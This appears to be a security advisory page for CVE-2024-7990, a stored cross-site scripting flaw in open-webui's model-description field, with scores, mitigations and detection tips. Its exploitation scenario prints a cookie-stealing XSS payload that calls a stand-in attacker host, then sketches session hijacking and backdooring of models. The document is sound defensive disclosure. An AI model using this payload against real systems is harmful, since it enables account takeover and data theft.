CVE-2024-7990 — HIGH (CVSS 8.4) AI Security Vulnerability

CISO Take

If your team runs open-webui 0.3.8 or earlier as an LLM interface, any user with model-creation privileges can plant a persistent XSS payload that executes in every admin's browser — including stealing session tokens and performing privileged actions. No patch is currently listed; restrict model-creation to trusted admins immediately and enforce a strict Content Security Policy. This is a privilege-escalation path disguised as a UI bug.

Risk Assessment

Despite requiring High privileges to inject (PR:H), the Scope is Changed (S:C) with C:H/I:H/A:H — meaning a lower-trust model contributor can fully compromise admin-level sessions. The stored nature amplifies impact: a single malicious model description persists and executes for every subsequent viewer, including privileged users. EPSS is low (0.00158) and not in KEV, indicating no confirmed in-the-wild exploitation yet, but the attack is trivially executable by anyone with a model-add account. Exposure is high in organisations running shared open-webui instances across teams.

Affected Systems

Package	Ecosystem	Vulnerable Range	Patched
open-webui	pip	<= 0.3.8	No patch
135.3K Pushed 8d ago 58% patched ~9d to patch Full package profile →

Do you use open-webui? You're affected.

Severity & Risk

CVSS 3.1

8.4 / 10

EPSS

0.3%

chance of exploitation in 30 days

Higher than 53% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Trivial

Exploitation Confidence

medium

○ CISA SSVC: Public PoC

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV Network

AC Low

PR High

UI Required

S Changed

C High

I High

A High

Recommended Action

5 steps

IMMEDIATE

Restrict model-creation permissions to sysadmins only — remove this capability from general users until patched.
PATCH

No official fix listed for 0.3.8; monitor the open-webui GitHub for a patched release and upgrade as soon as available.
HARDEN

Deploy a strict Content-Security-Policy header (script-src 'self') on your open-webui instance to block inline script execution.
DETECT

Review audit logs for unexpected model additions (/api/v1/models/add POST requests) from non-admin accounts. Inspect existing model descriptions for <script>, onerror=, javascript: patterns.
ISOLATE

If multi-user access is required pre-patch, place open-webui behind a VPN or enforce IP allowlisting to limit attacker surface.

CISA SSVC Assessment

Decision Attend

Exploitation poc

Automatable No

Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Code Execution Data Extraction Auth Bypass Framework API AML.T0011 - User Execution AML.T0012 - Valid Accounts AML.T0049 - Exploit Public-Facing Application

Compliance Impact

This CVE is relevant to:

EU AI Act

Art.15 - Accuracy, robustness and cybersecurity

ISO 42001

A.6.2.5 - AI system security in operation

NIST AI RMF

MANAGE-2.2 - Mechanisms for risk treatment of identified AI risks

OWASP LLM Top 10

LLM05:2025 - Improper Output Handling

Frequently Asked Questions

What is CVE-2024-7990?

If your team runs open-webui 0.3.8 or earlier as an LLM interface, any user with model-creation privileges can plant a persistent XSS payload that executes in every admin's browser — including stealing session tokens and performing privileged actions. No patch is currently listed; restrict model-creation to trusted admins immediately and enforce a strict Content Security Policy. This is a privilege-escalation path disguised as a UI bug.

Is CVE-2024-7990 actively exploited?

No confirmed active exploitation of CVE-2024-7990 has been reported, but organizations should still patch proactively.

How to fix CVE-2024-7990?

1. IMMEDIATE: Restrict model-creation permissions to sysadmins only — remove this capability from general users until patched. 2. PATCH: No official fix listed for 0.3.8; monitor the open-webui GitHub for a patched release and upgrade as soon as available. 3. HARDEN: Deploy a strict Content-Security-Policy header (`script-src 'self'`) on your open-webui instance to block inline script execution. 4. DETECT: Review audit logs for unexpected model additions (`/api/v1/models/add` POST requests) from non-admin accounts. Inspect existing model descriptions for `<script>`, `onerror=`, `javascript:` patterns. 5. ISOLATE: If multi-user access is required pre-patch, place open-webui behind a VPN or enforce IP allowlisting to limit attacker surface.

What systems are affected by CVE-2024-7990?

This vulnerability affects the following AI/ML architecture patterns: LLM web interfaces, model serving, multi-user AI platforms, agent frameworks.

What is the CVSS score for CVE-2024-7990?

CVE-2024-7990 has a CVSS v3.1 base score of 8.4 (HIGH). The EPSS exploitation probability is 0.29%.

Technical Details

NVD Description

A stored cross-site scripting (XSS) vulnerability exists in open-webui/open-webui version 0.3.8. The vulnerability is present in the `/api/v1/models/add` endpoint, where the model description field is improperly sanitized before being rendered in chat. This allows an attacker to inject malicious scripts that can be executed by any user, including administrators, potentially leading to arbitrary code execution.

Exploitation Scenario

An attacker with a low-privilege open-webui account (e.g., a researcher or contractor) calls `POST /api/v1/models/add` with a model description containing `<img src=x onerror="fetch('https://attacker.io/steal?c='+document.cookie)">`. The payload is stored in the database. When the admin next opens the model catalogue or a chat session referencing this model, the script fires in their browser context — exfiltrating the admin's session cookie. The attacker replays this cookie to gain full admin access, then modifies system prompts across all models to exfiltrate user queries or inserts a backdoored model pointing to a malicious endpoint, persisting access even after the original XSS is discovered.